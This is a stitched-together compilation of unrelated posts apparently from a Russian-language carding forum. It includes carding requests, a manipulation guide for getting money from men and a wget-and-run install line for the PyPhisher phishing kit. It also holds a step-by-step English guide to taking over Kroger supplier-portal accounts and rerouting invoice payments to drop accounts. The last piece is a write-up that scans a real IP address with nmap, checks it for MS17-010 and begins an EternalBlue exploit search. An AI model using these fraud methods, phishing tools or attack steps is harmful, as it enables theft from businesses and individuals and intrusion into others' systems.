Кардингом начал интересоваться около 3 недель назад, словарь подучил. За это
время уже заскамили на 200$. Но я не растраиваюсь и большое желание изучать и
пробовать работать.
Мне интересн кардинг по Австралии. Прошу помочь с информацией, а также, если
есть, то контактами. Готов впитывать и познавать информацию, как губка.
Спасибо!
Настроение такое, что захотелось малость "по-морализировать" на темы: как нужно жить, как добиваться поставленных целей, как реализовать бурлящие внутри себя амбиции и как взаимодействовать с внешним миром, если ты ни к чему не приспособленный в жизни мудак)) В ходе прочтения статьи у Вас может созреть вполне резонный вопрос: "как это "чтиво" относится к кардингу?!". Напрямую - никаким! На мой взгляд, в этих строках многие узнают себя. Всё, что здесь описано применимо во всех областях и как показывает личный опыт, кардинг - не исключение!
Собственно на почве чего возникла идея написания данной статьи - ко мне довольно часто обращаются разные люди с какими-то вопросами, будь то личка или жаба/аська. Большинство задают вполне вменяемые вопросы, на которые получают развернутый ответ и мы оба остаёмся довольны. Человек получил ответ а я моральное удовлетворение от того, что смог кому-то помочь. Но бывают редкие исключения, когда в личку "наяривают" конкретные ебланы-попрошайки или же идиоты с настолько глупыми вопросами, что уму непостижимо. Иногда просят скинуть гифты на халяву, мол я попробую, а как сорву куш - отдам тебе в 10 раз больше. Или сделай на меня технику, а я выступлю в качестве дропа - как перепродам - скину тебе процент. Да-да, бывает и такое)) Некоторые еще так формируют своё обращение, что складывается впечатление того, что я им что-то действительно должен.
Но эта статья не для них, им всего описанного здесь - не понять ни при каких условиях! Данная статья для тех ребят, которые как им кажется, находятся в некой крайности из-за того, что постоянно ничего не получается а если и получается - то масштаб всего это очень скуден. Такие ребята могут прочесть форум от корки до корки, но тем самым в их кармане по-прежнему гуляет ветер. Большинство приходят в теневую индустрию с целью улучшить качество своей жизни и добиться каких-то нетривиальных целей, таких как покупка автомобиля, дорогого смартфона, трахать баб по-дороже и т.д. Но после столкновения с реальностью - опускаются руки. Сейчас существует не один фильм и даже написано несколько книг, не говоря уже о многочисленных статьях на разных ресурсах, где кардинг позиционируют как некую халяву, романтические приключения "хакера" и в последствии малоприятный конец почти всех подобных историй. Многие думают, что у них всё будет хорошо, будут пиздить кеш с ворованных карт и никогда не попадутся. На деле же - всё еще проще, после первого неудачного вбива - опускаются руки. А все эти романтические иллюзии - будьте уверены, с Вами такое вряд-ли случится, да и время уже давно не то. Ну что же, давайте приступим и я попытаюсь рассказать, как дела обстоят на самом деле.
Чтобы Вы не думали, что я какой-то там хрен с горы и не имею малейшего права высказываться о подобном, хочу рассказать вкратце о себе, так сказать собственную историю и донести для многих "хомячковых оранизмов" - что нет ничего невозможного. Эту небольшую историю я уже вкратце рассказывал ранее, но здесь я выделю самое главное, что должно помочь и Вам!
Так вот, как уже сейчас не редкость - я жил с мамой и с бабушкой, так как отец ушел из семьи еще когда мне было лет 5-6. Когда мальчика воспитывают две женщины они невольно подавляют в нём его мужские инстинкты, внушают веру в любовь, бога, честность по отношению к другим людям. Как говорится делай добро и тебе воздастся. Хоть я с детства был по своей натуре авантюристом, что только не придумывал чтобы заработать денег и потом можно было выебнутся перед сверстниками, какими-то крутыми вещами или еще чем-то. За что очень часто получал пизды от мамы, когда конкретно "накосячу". В итоге к 18-ти годам во мне подавили всё, что можно. Стал сентиментальным эстрогеном, который впадал в отчаяние когда меня бросали бабы или с новыми подружками ничего не клеилось, деньги зарабатывать нормально не мог, от чего тоже постоянно находился в полудепрессивном состоянии. Благо я вовремя одумался, посмотрел на своё окружение, непонятные связи, бабы,друзья и прочая шелуха - было принято решение от всего этого избавится и начать новую жизнь и искать новые знакомства.
К 18-ти годам я уже довольно неплохо разбирался во front-end разработке и хорошо рисовал в фотошопе, и при желании мог зарабатывать даже на тот момент около $200 в неделю, но комфортные условия мне не позволяли напрягать задницу и что-либо делать. И в один прекрасный момент, я понял, что так нельзя и решил так сказать, выйти из зоны комфорта и съехать от родителей а там будь что будет. В кармане было около сотки баксов в гривневом эквиваленте, собрал всё что мне надо было, труселя, носки и т.д. ииии я уехал и своего захалустья, причем в другой город. Не буду говорить какой именно, но он входит в четвёрку самых крупных городов Украины.
Как только приехал, у меня разбегались глаза от того, насколько здесь всё красивое и какие крутые здесь женщины, это был центр города. Честно говоря, чувствовал себя девочкой-провинциалкой, приехавшей поступать в университет. С каждой минутой таксист отвозил меня всё дальше и дальше на окраину города, где по-сути уже ничего не осталось от красивых огоньков центра города)
Денег было не много и я снял квартиру на трое суток, всё это время я вьебывал конкретно. Верстал странички, рисовал макеты - всё для того, чтобы можно было что-то пожрать и были деньги на то, чтобы снимать квартиру дальше, эту же или в другом месте.
В таком напряженном состоянии я жил около месяца, пока не снял нормальную квартиру на год. За этот месяц я делал всё, что можно, фрилансил, кидал на бабки на досках объявлений и еще кучу всяких авантюр связанных с мошеннической деятельностью в сети. Можете начать меня осуждать за это, но когда ты находишься в условиях, когда тебя завтра могут выгнать на улицу и тебе нечего жрать - будешь впадать во всевозможные крайности. Кстати примерно во время этого периода я и познакомился с кардингом и уже как-то пробовал себя в вещевухе. Занимаясь вещевухой я наломал кучу дров, но обстоятельства заставляли меня не сдаваться и продолжать работать.
Постоянно работая, не отвлекаясь ни на что я смог улучшить качество своей жизни и заработать себе на те "игрушки", о которых мечтал. Познакомился с новыми, интересными людьми и т.д. И что я понял действительно - халявы никакой нет, её нет в приниципе нигде! Во всё, чем я занимался мне приходилось много работать. Если Вы зашли на форум, прочитали какой-нибудь мануал, попробовали и у вас нихуя не вышло - не надо думать, что на этом всё закончилось и кардинг умер. Мне иногда ради вбива приходилось убивать до 50-ти картонок и ничего. Самая простая методика, чтобы чего-то добиться в любой деятельности - это вьебывать! Работать постоянно и с небольшим отдыхом, если опускаются руки - заставлять себя. А лучше всего выйти из зоны комфорта, загнать себя в такие условия - где инстинкты Вас заставят работы, так как мозг посчитает это опасностью для жизни и вы будете работать ни смотря ни на что!
За этот период я переосмыслил жизнь и понял её настоящую, без выдуманных иллюзий и шаблонов общества.
Вот основные инструменты, которые должны помочь (но это не точно):
Работать и только работать - Если вы действительно чего-то хотите, то это не так уж сложно получить. Когда вы будете заставлять себя работать - безусловно будет трудно. Но поверьте, не передать словами тот кайф, когда от вашей деятельности будет идти постоянная отдача. Для мужчины нет ничего более важного - чем его дело!
Поставить себе цель - Поставьте себе цель, пускай небольшую, например купить айфон. Это цель достичь можно будет очень быстро, как только эйфория от покупки пройдет - ставьте новую цель, более глобальную и достигайте её любым путем!
Забейте на все рамки и предрассудки - Не бывает честных и одновременно богатых людей. Это два разных человека, если Вы хотите сколотить денег, много денег, то в какой-то ситуации придется пренебречь общественными рамками и рамками закона.
Выйти из зоны комфорта - Главное правило, которое заставит работать 24/7. Не буду объяснять зачем это нужно, испытания для себя придумывайте сами. Мог бы я парочку советов дать, но боюсь вы можете их интерпретировать по-своему.
Изменить круг общения - если твои "друзья" тянут на дно, пойти побухать, травы покурить и т.д. - это не твои друзья, стремись к общению с более развитыми людьми и ты поменяешься сам.
На этом всё, надеюсь, вы поймете эту статью правильно и для кого-то она станет мотивацией работать и добиваться своих целей.
© copyright
**Как мужикоф на бабосы разводить.
У каждой женщины **конечно свои методы, буду рада дополнениям. Пока мои
советы.
1. Не надо стесняцца это делать – по сути дядьки для того и деньги
зарабатывают что их тратить на нас, любимых. Некоторые могут сказать, что
зарабатывают на новую машину или квартиру, смотрите глубже – новая машина
придецца по вкусу большему количесву женщин, а квартира снимет ограничения в
плане в любое время привезти одну из нас домой с общеизвестной целью, так что
и эти траты по сути своей – на женщин, и не сколько на женщин как на таковых
ради удовольствия дать то, что не может она себе позволить, а просто чтоб
переспать..(абидна но факт)
2. Не нада перегибать палку ( в букв. Смысле при грамотном динамо до нее
дело вапще не должно дойти), а серьезно ни в коем случае нельзя дать понять
дядьке что он кошелек с ушками, потому что буит мстить, а у человека которого
есть деньги к тому есть масса возможностей. Чего не следует делать:
а) не спрашивайте прямо сколько он зарабатыват
б) не интересуйтесь машиной, если ее есчо не видели
в) не спрашивайте о стоимостях костюма, часов и т.д.
г) вообще забудьте слово «деньги» они вас не интересуют.. только чувства
Мужчины существо примитивные – они думают только о тех словах которые вы
говорите и понимают все буквально. Если спросить сколько стоит твоя машина, то
логика, которой он пользуецца подскажет следующее:
Спрашивает не из праздного любопытсва – по ней вижу, явно не купить завтра
собралась, а то бы про обьем движка спросила, расход, маневренность и т.д.
значит спросила узнать сколько я готов выкладывать за машину, то бишь сколько
я зарабатываю,значит ее только деньги интересуют – СТОП! Везу ее домой….
3. Не надо строить из себя бедную студентку – никаких разговоров про тяжелую студенческую юность!!! Про маленькую зп, про высокие цены на хлеб и на колготки………..Чувство жалости пробудите 100%, а вот желаемый эффект не наступит – бедную студентку удовлетворить легче, купит вариант попроще… мужчинам свойственно экономить на других, особенно если они экономят на себе.
Мужчина должен потратить на Вас сумму большую, чем до этого рассчитывал! Чем больше денег и нервов он на вас потратит, тем дольше его можно буит юзать в дальнейшем.
4. всегда страхуйтесь от козлов – если в ресторане, заказывайте все. Что сами можете оплатить, а в магазине смотрите на ценники, разве что он скажет что платит он, но как правило, никто при первой встрече подобного бреда не говорит (акклиматизировались-таки)
5. Не говорите о ресторанах, барах бутиках, где были, разве что сам спросит, но и то, лучше уйти от темы, не показывайте, что вы там частый гость, иначе заподозрит своим аналитическим умом неладное.
6. Когда принесут счет в ресторане например следите за официантом – если положит счет посередине стола, можете доставать кошелек (яркое средство!!!!), если он не последний козел, то вы достанете его в последний раз… В эту минуту он поймет, что перед ним женщина, которая способна сама за себя платить, и поймет, что она с ним не ради денег,, и буит с удовольствием тратить на нее … чего собсно и нада добицца
если он никаких действий к вытянутому кошельку не предпринимает, а у вас денег нет, спросите можно ли рассчитаться Американ экспресс (как правило эта платежная система наименее распространена) и когда официант скажет что нет (99%),то наивно предложите в след раз угостить его обедом… просто так вышло)
7. Не капризничайте, не стоит дергать за рукав и говорить – хочу то, хочу
это!!! Просто присматривайтесь к какой либо вещи долго.. спрашивайте его
совета относительно покупки, примеряйте, но не покупайте, не обьясняя причину…
когда спросит, можно сказать что Вас беспокоит, только упаси боженьки говорить
что ПОКА не можете себе позволить этого! Потому что он все поймет буквально!
Особенно слово – пока, вывод прост – раз пока не может, то на этот раз куплю
ей я, а потом фин неурядицы у нее кончацца… а потом снова та же ситуация и вы
будете смотрецца глупо.. типа у вас всегда такое положение, токо нафига тогда
в дорогие магазины заходить…. Ему не в домек..
Лучше дать понять что приглянувшаяся весчь Вам очень нравится, но вы в силу каких-то моральных соображений не можете позволить покупать непрактичные вещи.. но именно эту вам безумно хочецца. Уверяю – КУПИТ! И не раз. (у меня так с телефоном было)
8. бывают мужчины которые думают, что кто женщину гуляет, тот ее и танцует. Смейтесь в лицо, их это обезоруживает… и в выражением «ты че, дебил?» разворачивайтесь в сторону своего дома.
И последнее…
Разводить мужикофф на деньги приятное премяпровождение, веселая забава, чисто
женская игра динамо. Разводя , как маленьких, мы даем ему чувство мнимого
преимущества… они бедняжки это ценят.
ПыСы: немаловажно отличать богатого дядьку от бедного.
Машина (вариант служебная) наличие личных вещей, мусора говорит о том., кто
собственник. Спросите об авариях, о стаже и первой машине. Сам расскажет чья
это
Одежда: можно обмануцца - внимательно к маркам (правильное написание известных марок), и даже если гардероб изысканностью не поразит, не спешите списывать его.. некоторым мужикам шмотки в х не впились, одеваюцца скромно. Рынок от спригнфилда желательно отличать, заходите в мужские магазине, смотрите на вещи, учитесь понимать мужскую моду
Аксессуары (очень важно!!!) часы не покупаюцца в кредит нормальными людьми в кредит, поэтому известная марка выдаст мажорика на раз, второе очень важное – очки. Обратите внимание…
Не стоит обращать внимания на мобильник… его берут в кредит, находят, теряют, берут попользовацца.. не показатель короче…
И есчо одно … просто для инфы мы косвенно на них тратим куда больше денег
сами – шмотки, белье, косметика, волосы, ногти и т.д…..Т.е. нащ внешний вид,
который они так любят, и ради которого все жертвы материальные…
Они не знают какие это бешенные суммы((( так что угрызения совести тут ни к
чему)) смело за покупками, Леди!
Автор: BlondiE
Всем привет, выдел раньше на просторах интернета фейки под сбор сс если у кого остались скиньте плз только не ру.
Большинство отчетов описывают конкретные атаки, рассказывая лишь часть истории REvil. Цель данного документа - предоставить оценку "общей картины" преступной организации REvil, представив "от колыбели до могилы" оценку действующих лиц, стоящих за ней, и их операций с течением времени. Кроме того, есть уроки, которые мы можем извлечь из преступной организации, которая, по большей части, добилась успеха там, где другие потерпели неудачу.
Вам открыли доступ к файлу. Отправлено с помощью Облако Mail
cloud.mail.ru
Даже самые продвинутые службы безопасности мало что могут сделать для защиты от вреда, причиняемого простым сотрудником, который перешел по вредоносной ссылке, открыл вложение электронной почты или раскрыл конфиденциальную информацию во время телефонного звонка. Эта книга поможет вам лучше понять методы, лежащие в основе атак социальной инженерии, и узнать, как помешать киберпреступникам и злоумышленникам, которые используют человеческие слабости в своих целях.
Джо Грей, отмеченный наградами эксперт в области социальной инженерии, делится примерами из практики, передовым опытом, инструментами аналитики с открытым исходным кодом (OSINT), заготовками для организации атак и шаблонами отчетов, чтобы компании могли лучше защитить себя. Он описывает творческие методы, позволяющие обманным путем выманить у пользователей их учетные данные: использование сценариев Python и редактирование файлов HTML для клонирования легального веб-сайта. Научившись собирать информацию о ваших жертвах с помощью передовых методов OSINT, вы узнаете, как защитить свою организацию от подобных угроз.
](https://cloud.mail.ru/public/Ngmj/o82oQ6Pno)
Вам открыли доступ к файлу. Отправлено с помощью Облако Mail
cloud.mail.ru
Эта статья предназначена для новичков в сфере фишинга
Spoiler: Фото--Photo
Spoiler: Скрипт
Easy to use phishing tool with 77 website templates. Author is not responsible for any misuse. - KasRoudra/PyPhisher
github.com
Spoiler: Как установить?
wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py
Spoiler: Что он может
This article is for beginners in the field of fishing.
Spoiler: Script
Easy to use phishing tool with 77 website templates. Author is not responsible for any misuse. - KasRoudra/PyPhisher
github.com
Spoiler: How to install?
[+] Installation
wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py
Spoiler: what can he
I work in many fields and you can probably tell if you've seen my posts all over but my favorite has always been fraud even though I don't spend as much time on it these days.
Today I will share a valid and active method I developed that anyone can execute if they put in the work for $5k-$15k ach deposits into your drops. You can also use this for inspiration to seek out similar targets to exploit. This field is unsaturated and I don't see anyone doing it consistently. You can make a comfortable living off of this for a while no matter what country you live in.
Big retail department stores, grocery stores, clothing stores, every kind of big shop works with suppliers. Suppliers sell them the stuff you buy off the shelves and in 2022 its very common that vendors have their own unique login portal on major sites. They can update their information, tax info, keep track of inventory and what is owed to them. For major suppliers in the west it is very common that they do not get paid for their deliveries for a week or two and many will keep supplying the stores and just keep track of what is owed to them and include this all on their invoices 3 or 4 times a month. They send the stores invoices for the total owed to them and the stores make large direct deposit transfers covering it all at once.
The target for this article will be kroger since its the latest and current one I'm stealing from. Our goal is to get credentials for supplier accounts, locate the supplier portal and login and change the banking details to our drop info without making lots of noise or doing any extra things that might cause alarm. We do this to a handful of accounts and sit back and wait a few days to a week to see direct deposits getting rerouted to our drops =) The great news is that many times suppliers dont even notice for a while, especially if theyre big suppliers that are busy with many stores. I've had some go unnoticed for 2 months lol and just keep getting their payments everytime they invoice the store. Here are some recent examples
I use cashapp accounts for the drops which has good sides and bad sides. The good side is that it accepts deposits without locking in any name, including the supplier we are pretending to be. The bad news is every deposit over $25k gets rejected, and 3 rejections seems to get them closed. You can play with this or use your own solution if its superior. This kind of work is not my main work, just side projects because I enjoy fraud so its not worth my time dialing this in when ill get bored quickly and look for the next interesting thing soon anyway.
Here we have krogers supplier portal:
supplier.kroger and supplier.krogerapps both direct here. Always check for all possible url variations when looking for your logs/creds to test because you might increase your possible combos by 20,50,100% and others missed them too. Maybe the url has recently changed, maybe there are multiple redirects. All those are also potential links for logs to check.
We login and we see this:
Make sure you use a valid email when you add yourself as an employee, and always check finance/accounting. After this is done you should receive an automated email from c2fo requesting you to register an account. This is where the supplier invoices are. Usually you would wait until they get paid and hope you go unnoticed until you steal a few deposits without them catching on but kroger has recently started an early payment program for suppliers. Here is some info:
This means when you get the invite to register at c2fo, then login you will see all the invoices that are unpaid and have the option to get them paid immediately if you agree to give kroger a 5-10% discount off the total of them. Its simple and takes 2 seconds to agree to their discount. Then submit and you will see the money for them in your drop within 1-2 days.
I want everyone reading this to know that anything I write or offer in any of my post history will not waste your time. You have my word. I do not write these things because i am bored, i am a very busy man and I respect and value your time the same as i do my own. I know many of you are jaded and sick of reading so much pointless outdated crap that doesnt work and has no point to it and everyday that shit grows and has since 2008. Thats not going to stop, its too late but if find yourself with a little time and something of quality to share consider dropping a quick write up like this. It helps
По горячим следам: или как парень с отрицательным IQ 6 лет безнаказанно кидал людей на деньги - при чем здесь нейросеть и онлайн игры
Отдаленный звук сирены. Какой-то шепот назойливо бубнит в ушах. Твои мысли сконцентрированы лишь на одном. Паранойя? Нет, реальность. Ведь он повсюду. Нельзя даже нормально почитать новости, где кто, где их оппозиция, а где желтая пресса. Это все то, что люди любят и что так дорого их сердцу. Совсем скоро искусственный интеллект это все напрочь вытеснит, но перед этим позволь мне задать тебе один вопрос: какие ассоциации у тебя, когда ты слышишь об ИИ?
Возможно, это будут роботы из Бостон Дайнемикс, а может и робот-пылесос, который ездит по квартире и называет всех кожаными ублюдками, попутно затирая что-то об ущемлении прав чернокожих, а возможно нейросеть, которая напишет песню с лирикой не хуже, чем у Моргенштерна, это, естественно, ирония. Помнишь, вчера ты проходил вот эту надоедливую капчу, выбирая кадры со светофорами, велосипедами или людьми? Так вот, сам того не замечая, ты внес свой вклад в развитие нейросетей.
А вот обычный телефон, вчера ты случайно поставил лайк на фото с Райаном Гослингом, а сегодня с утра твоя лента пестрит предложениями посмотреть Бегущего по лезвию, Драйв или Дневник памяти. А замечал ли ты, что тебе часто приходят уведомления о происшествиях из жизни тех людей, которые тебе интересны? (Реклама знакомств с милфами не в счет, её предлагают абсолютно всем и каждому).
Дисклеймер
На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.
И напоминаю, что в рамках этой связки статей у нас действует конкурс на 5.555 рублей, а связан он с отсылками в моих работах: культовые фильмы, анимешки, да и просто мемы с играми. Узнали? Пишите комментарий, ведь тот, кто раздает все пасхалки - получит денежку.
Часть первая: тот самый Степан и его уникальная схема развода
Итак, данный выпуск не будет содержать каких-то серьезных способов обмана или продвинутых схем по выкачке денег. Здесь будет некая подборка сверхразумов, естественно утрирую, которые каким-то образом достигли мысли об использовании ИИ в своих схемах.
Так как гении зачастую становятся отвергнутыми обществом, обычно они имеют целый ряд “замечательных” и отличительных черт своего характера: замкнутые, малообщительные и обиженные на всех и вся. Первая часть этой статьи будет состоять из рассказа об одном из таких индивидов, в силу прогрессирующих умственных дефектов и репрессий лишней хромосомы данный субъект подвержен маниакальному мнению о превосходстве собственной личности над другими, Субъект А, а именно так будем его называть, не брезгует любыми методами по пути достижения своей цели, а она у него прозаично проста, в отличие от самомнения
В какой-то из своих статей я уже упомянул, что являюсь заядлым игроком в старенькую игрушку Counter Strike 1.6. Так как в этой игре действительно сочетается то самое немногое, отсутствующее в большинства современных играх, а именно наличие достаточно дружного и общительного комьюнити нытиков, с которым можно как просто поговорить, так и здорово поссориться, в добавок плюсом является взрослая аудитория. Эта игрушка является для меня своего рода отдушиной, в которой я просто могу избавиться от лишних мыслей и отдохнуть, общаясь с различными интересными, ну и не очень, личностями.
И здесь я хотел бы обратить особое внимание, что играю я достаточно неплохо, до киберспорта, конечно, достаточно далеко, но, в принципе, этого с лихвой хватает, дабы выводить людей на эмоции, а сие дело меня особенно веселит.
И вот на данном этапе, наверное, у вас закрадывается мысль - а какое отношение все это имеет к теме статьи? А вот читайте дальше и все прояснится.
Собственно говоря, на одном из серверов, где играют исключительно взрослые и состоятельные нытики, у которых явно все отлично в этой жизни. На глаза мне попадается как раз-таки этот Субьект А. Изначально я просто думал, что у него нелады с головой, так как будучи администратором проекта он не брезговал высказываниями в стиле “Выйди отсюда ублюдок” или “Смаааатрии он по квадратам наводитсо через стену”. Где-то здесь я оставлю запись его разговоров, чисто посмеяться.
Изначально меня это забавляло, но после часового спектакля в одну роль, так как я просто не отвечаю на подобное, сие ситуация достала не только меня, но и других людей. В развязке этого я просто получаю бан якобы за воллхак, которого, естественно, у меня не было.
И вот с этого момента начинает происходить мистика, как оказывается сервер построен таким образом, что в принципе любые баны он не регистрирует и кроме сообщения ничего не происходит. Намеренно ли это сделано или просто ошибка - я до сих пор сомневаюсь, но то, что начнет происходить дальше это отдельный вид искусства.
Я снова захожу поиграть, ну как бы меня больше тогда ничего и не интересовало в принципе, так как я болел и настроения выяснять что-либо у меня не было. Здесь стоит отметить наперед, что этот персонаж сперва расспрашивал как меня зовут, откуда я и так далее. В ответ же сам ничего не говорил, потому я детально изучил профиль в Стим этого бравого борца с читерами, которых и вовсе там не было. Это напоминает мне вот этого парня, который предпочитает борьбу с, цитирую: “невидимыми несуществующими драконами”, реальности.
“А он ещё и бан обходит, пойду писать создателю”- , с этими словами Субьект А, покидает поле наших действий, по крайней мере тогда я так считал.
Спустя минут 20 на сервер заходит некий игрок под ником “Wizard”, я сразу же смекаю, что это тот самый создатель и видимо дальше играть здесь у меня не получится, но решаю просто закрыть на это глаза.
Спустя пару мгновений ко мне приятным голосом девушки обращается этот самый создатель, меня это немного удивляет, но заводится типичный разговор, типа “кинь демку и пройди проверку античитом”, что для меня особых затруднений не составило. Но меня больше смутило наличие какого-то механического оттенка в голосе. Если вы помните, когда-то в одном из циклов мы рассматривали возможность подделки голоса с помощью искусственного интеллекта, и у меня сразу же возникло вот это ощущение, что сейчас будет что-то интересное.
Здесь немного отвлекусь, существует универсальный античит для КС 1.6, который именуется как Варгодс: он осуществляет полную проверку устройства и самой игры на наличие использования посторонних программ для получения преимущества. Обычно администраторы просто говорят, мол “Загугли, скачай и просто кинь ссылку на результаты в чат”. Здесь все идет абсолютно иным образом - Она , он или оно кидает ссылку на скачивание ( deathrunner.cshost.su/wargods), открыв которую мы видим следующую картину:
Сразу же можно понять, что это попросту файлообменник, открывающийся самым
примитивным образом. Ну, естественно, я решил скачать данный файлик и после
проанализировать, ведь я считаю, что в нем далеко не все так просто, но сейчас
открывать его не стану, отморозившись, мол у меня провайдер блочит ссылку на
скачивание, потому я взял программу с официального сайта и кидаю результат.
Якобы девушка-владелец, хотя на то время я уже знал, что это действительно владелец, а значит, что у этого персонажа есть доступ к моему реальному айпи адресу. Хотя в принципе мне этого страшиться незачем, ведь максимум, что у них выйдет мне сделать это… Ничего. Кстати, если хотите могу сделать детальный гайд где-то по аудиту безопасности собственной системы, если кого-то такое интересует.
Хотел я сказать не это совсем, Wizard заметно поник после того, как я не открыл именно его программку, но сказал, что все в порядке и читов у меня нет, но “она” затем предложила купить иммунитет, чтобы подобная ситуация не повторялась. На деле, на серверах , где я активно играю, всегда покупаю какую- то привилегию, дабы не выделяться особо. Потому я согласился, перешел на их форум, кстати, выглядит он вот так:
И перешел в раздел покупки, затем пополнение баланса через сервис Интеркасса.ком, на тот момент я не обратил особого внимания на различия ссылки в адресной строке с оригиналом, так как не особо часто-то и пользуюсь таким сервисом. Сразу же после нажатия на кнопку PAY, идет перенаправление на исходную страницу реальной Интеркассы.
То есть, не тяжело понять, что только что я отдал все данные своей карты злоумышленнику. Если начисто, то их запросто теперь можно продать на каком-то сомнительном сайте в дарквеб и получить гроши в виде 1-2$, так как заметьте, что без подтверждения через СМС или приложение на данный момент списать с карты средства невозможно. Если, конечно, речь идет о современных банках, а не дрянных, застрявших в прошлом столетье.
Здесь хочу заметить, что аудитория проекта, состоящего из нескольких серверов, составляет около 300 человек, примерно половина купит здесь какую-никакую привилегию или снятие бана. Думаю, что все складывается в достаточно неплохой теневой бизнес.
Благо, что у меня динамический CCV да и номер карты я могу менять по собственному желанию сколько угодно.
Но и это ещё не конец, за очередной дозой материала мне захотелось ещё побыть на этом сервере, думалось мне, что будет ещё о чем рассказать и я не ошибся, черт возьми. Я был прав. Помните Субъекта А? Также у меня уже существовало некое понимание ситуации и Субъект А на 90 процентов был той самой девушкой- создателем, которая или который… Черт, как к нему обращаться… Проще говоря Оно уже попыталось дважды скомпрометировать мои персональные данные.
Так вот, сразу же после того как я появляюсь в игре, объявляется ещё одна псевдо барышня. Напомню, что общаясь с Субъектом А, я подчистую выдал данные типа своего имени, города проживания и так далее.
На сей раз никнейм “Рыбка”, но вот незадача профиль Стим тот же, что и был у Субъекта А. Но я решил подыграть, да будет так. Естественно, эта рыбешка завела разговор ещё с кем-то, возможно, тоже подставным фигурантом игры, где как-бы невзначай упомянула, мол она из города автора, то есть моего. После уже подключился я, где сделал вид наивного дурачка и позволил себя развести. В итоге все дошло до предложения сходить вместе на фильм, которое я, естественно, принял.
Оу-у, к слову. Механический тон голоса и тембр остался тем же, что и у создателя.
И я вот все думал в чем здесь подвох, а был он в поддельном сайте кинотеатра моего города, где оплата ссылалась на ту же самую поддельную страницу интеркассы, но в этот раз уже чутка иначе, ведь форма оплаты здесь действительно работала. Помните, мне один парень писал, что его так развели на сайте знакомств? Ну вот же оно. Аналогично.
Часть вторая: ищем Степашку-дурашку и отбираем его бизнес
Ну и после я просто словил бан по железу и айпи, хотя для меня это особых проблем-то и не составляло. Первым делом хочется мне проанализировать тот самый файлик, якобы античит, который меня заставляли качать.
Но сперва давайте рассмотрим те самые фотографии, которые использовал наш гений Субъект А. На деле мне изначально вовсе показалось, что это просто какая-то картинка из интернета, но если рассмотреть профиль в телеграмме, который пестрит фотками, то можно заметить некоторую оплошность, где-негде виднеются смазывания, плюс сама кожа лица имеет явно неестественный окрас. Воспользовавшись тем же FaceApp можно сделать что-то подобное, но не настолько качественно.
Потому на Гитхабе я нашел готовый репозиторий с обученной нейросетью, который способен выдать подобный результат. В принципе, выгляжу теперь я вот так:
![](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2FDXJcx-o30kviB_fBYm51Xyn1c2xW9hupcAUA5gZdYOeFyuVP3lQpOql68IB_Dy_9Md- ucVVBThbDwsJFEzx22krwN5WWktTqoHTjWv_n0wvkN_5VuIP24Auzf90JeTKXiSwXUvDvunlpEJeB41MsQ1E&hash=a7fcbe05aac440669e7be06362033751)
Установить можно вот так, само использование предельно просто:
Code:Copy to clipboard
git clone https://github.com/twtygqyy/pytorch-SRResNet.git
Для генерации голоса в целом может подойти что-то типа этого:
Code:Copy to clipboard
git clone https://github.com/twtygqyy/pytorch-SRResNet.git
Но с наложенной маской и тембром женского голоса, хотя остается некая задержка и неестественность, да и работает только с английским, скорее всего Субъект использовал что-то иное, но на всякий оставлю ссылочку на видео на Ютуб:
Что же.. Для начала давайте просмотрим сам файл и его свойства, может быть чего интересного и заметим. Но, к сожалению, нет. Я не стал особо думать и просто залил этот файл на виртуальную машину, прежде просканировав его антивирусом, который показал, что это VNC Пэйлоад. Дабы убедиться в том, что он рабочий открыл простенький сниффер трафика и сам вредонос. Далее замечаем два новых подключения, которые идут в сторону айпи адреса игрового сервера, а сам процесс просто висит в диспетчере задач.
Здесь я сделал для себя два вывода: используется не хостинг серверов, а отдельный арендованный VDS с доступом через RDP и то, что Субъект А явно слегка или нет, но страдает каким-то умственным дефектом . Хотя если так посмотреть, то в большинстве случаев в КС 1.6 играют люди за 30, которым абсолютно плевать на вирусы и так далее, главное чего они хотят - расслабиться, потягивая пивко или что покрепче.
Учитывая, что целевая аудитория легкоубеждаемая, плюс зачастую под действием алкоголя, никак не связана со сферой IT или Информационной безопасности, то это идеальный плацдарм для таких вот манипуляций. Только вот проводить подобные деяния желательно в случае, когда твой собственный IQ выше 10, вот незадача, иначе будет больно.
Итак, просматривая форум проекта мне удалось добыть следующую информацию: сервер существует с ноября 2016 года, его айпи никогда не менялся, на нескольких порталах имеются жалобы от пользователей о скаме.
Мг-г, мое предположение, что этот сервер выглядит следующим образом изнутри - обычная CMD строка от имени администратора, а сама машина - это выделенный сервер, который предназначен для гражданского пользования.
Потому давайте просканируем айпи адрес в nmap:
Code:Copy to clipboard
nmap 91.211.118.87
Открытые порты: 3389, 80, 135, 445 27015 , операционная система Windows 7 .
С помощью сервиса 2IP проверим самого провайдера, чтобы убедиться, что это таки не хостинг-компания, результат вот:
Исходя из этого можно уверенно сказать, что это обычный, как говорили в году
2014, дедик.
А тут немного отвлечемся, так как злоумышленник А использовал поддельный сайт Интеркассы в первом случае, но с переадресацией на реальный сайт и оплату по счету пополнения. Интеркасса работает в качестве посредника перевода денег на карту, списывая комиссию за пользования сервисом, но за то якобы ваш номер карты остается незамеченным, вот только поискав что-то напоминающее счет я нашел вот это - 4441747424592742.
Затем, используя приложение этого банка, делаем перевод в несколько рублей, получая имя и фамилию получателя. Степан Жарков. А только потом я заметил, что номер карты был ещё и указан на странице пополнения.
Запомним это имя собственно, а теперь идем дальше к серверу, который имеет кстати открытый порт 445. Что наталкивает на мысль о том, чтобы использовать ЭтерналБлю, но сперва запустим чекер. Не будем мучать метасплоит, а используем nmap, выглядеть будет следующим образом:
Code:Copy to clipboard
nmap -p 445 -Pn --script smb-vuln-ms17-010 91.211.118.87
Хост выглядит уязвимым. Давайте проведем мануальную эксплуатацию, никогда так не делал, потому будет самому интересно.
Первое, что нам нужно сделать, это найти файл эксплойта. В Kali мы можем использовать searchsploit в терминале для поиска совпадений в базе данных:
Code:Copy to clipboard
searchsploit eternalblue
